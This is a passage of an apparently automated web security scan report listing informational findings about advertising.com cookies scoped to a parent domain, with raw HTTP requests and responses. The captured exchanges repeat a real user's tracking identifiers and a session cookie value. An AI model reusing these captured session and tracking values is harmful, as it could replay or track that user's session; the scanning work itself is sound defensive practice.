Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 3024464342=_4dc1f637,3024464342,743227^894905^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.87. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 0642027268=_4dc1f63b,0642027268,800563^894873^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.88. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5365043223=_4dc1f67d,5365043223,804145^894875^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.89. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 1346633562=_4dc1f67d,1346633562,804145^956559^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.90. http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/cdn/_uac/adpage.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bgd9B3kAAAAA6c1CAEAAgEABAAAABAAAAIAA+CA; BASE=RgwqwyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+G!; ROLL=boAno2C+PRAglcG!; C2=iXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzAyNjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973503.743206.93306656XMC
Set-Cookie: C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwRwR2XAO; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: ROLL=boAnr2C+PRAglcGLPJnzdbH!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1559

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

16.91. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

